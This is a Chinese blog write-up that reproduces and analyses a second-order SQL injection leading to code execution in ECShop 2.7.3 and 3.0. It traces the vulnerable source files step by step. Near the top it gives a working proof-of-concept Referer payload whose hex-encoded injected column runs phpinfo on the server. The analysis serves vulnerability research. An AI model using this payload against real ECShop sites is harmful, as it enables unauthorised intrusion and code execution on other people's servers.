之前渗透时遇到了这样一个站,当时看到这个二次注入引发的命令执行的过程有点意思,于是抽了个时间简单的复现分析了一下
前言
之前渗透时遇到了这样一个站,当时看到这个命令执行的过程有点东西,于是抽了个时间复现一下
环境搭建
IDE: PHPstorm
代码:
ECshop3.0
ECShop 2.7.3
POC
ECshop3.0
php 5.61
Referer:45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:110:"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x7b24616263275d3b6563686f20706870696e666f2f2a2a2f28293b2f2f7d,10-- -";s:2:"id";s:4:"' /*";}}45ea207d7a2b68c49582d2d22adf953a
漏洞分析
user.php 305行渲染的代码1
2
3
4
5
6
7
8
9
10//310行
if (empty($back_act) && isset($GLOBALS['_SERVER']['HTTP_REFERER']))
{
// 如果没有user.php, 则$back_act为referer
$back_act = strpos($GLOBALS['_SERVER']['HTTP_REFERER'], 'user.php') ? './index.php' : $GLOBALS['_SERVER']['HTTP_REFERER'];
}
// 330行
$smarty->assign('back_act', $back_act); // 渲染referer到模板
$smarty->display('user_passport.dwt');
跟进display
函数,includes/cls_template.php1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16// 106行
$out = $this->fetch($filename, $cache_id); // fetch模板,渲染变量
if (strpos($out, $this->_echash) !== false)
{
$k = explode($this->_echash, $out); // _echash为定值
foreach ($k AS $key => $val)
{
if (($key % 2) == 1) // 如果是奇数个
{
// 45ea207d7a2b68c49582d2d22adf953a这个相当于分割符,方便从html提取出序列化数据
$k[$key] = $this->insert_mod($val);
}
}
$out = implode('', $k);
}
跟进insert_mod
函数,includes/cls_template.php 1168行1
2
3
4
5
6
7
8function insert_mod($name) // 处理动态内容
{
list($fun, $para) = explode('|', $name); // |前的为函数名,后为参数
$para = unserialize($para);
$fun = 'insert_' . $fun;
return $fun($para); // 可以执行insert_开头的函数
}
可以通过控制referer,执行insert_
开头的任意函数,来看includes/lib_insert.php:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29// 141行
function insert_ads($arr)
{
static $static_res = NULL;
$time = gmtime();
if (!empty($arr['num']) && $arr['num'] != 1)
{
$sql = 'SELECT a.ad_id, a.position_id, a.media_type, a.ad_link, a.ad_code, a.ad_name, p.ad_width, ' .
'p.ad_height, p.position_style, RAND() AS rnd ' .
'FROM ' . $GLOBALS['ecs']->table('ad') . ' AS a '.
'LEFT JOIN ' . $GLOBALS['ecs']->table('ad_position') . ' AS p ON a.position_id = p.position_id ' .
"WHERE enabled = 1 AND start_time <= '" . $time . "' AND end_time >= '" . $time . "' ".
"AND a.position_id = '" . $arr['id'] . "' " .
'ORDER BY rnd LIMIT ' . $arr['num'];
$res = $GLOBALS['db']->GetAll($sql);
}
// arr可控,形成sql注入, 继续往下跟
// 170行
foreach ($res AS $row)
{
if ($row['position_id'] != $arr['id']) // 查库的第2列字段
{
continue;
}
$position_style = $row['position_style']; // 查库的第9列
$GLOBALS['smarty']->assign('ads', $ads);
$val = $GLOBALS['smarty']->fetch($position_style); // 重新带入模板渲染
接着,includes/patch/includes_cls_template_fetch_str.php1
2
3<?php
$template = $this;
return preg_replace_callback("/{([^\}\{\n]*)}/", function($r) use(&$template){return $template->select($r[1]);}, $source);
调select函数,includes/cls_template.php1
2//375行
return '<?php echo ' . $this->get_val(substr($tag, 1)) . '; ?>';
includes/cls_template.php get_val
593行1
2// 处理掉变量标签
$p = $this->make_var($val);
跟进make_var
, includes/cls_template.php1
2
3
4
5
6
7
8
9
10
11
12
13function make_var($val)
{
if (strrpos($val, '.') === false)
{
if (isset($this->_var[$val]) && isset($this->_patchstack[$val]))
{
$val = $this->_patchstack[$val];
}
$p = '$this->_var[\'' . $val . '\']';
}
// 705行
return $p;
代码执行,includes/cls_template.php1
2
3
4
5
6
7
8
9
10//1193行
function _eval($content)
{
ob_start();
eval('?' . '>' . trim($content));
$content = ob_get_contents();
ob_end_clean();
return $content;
}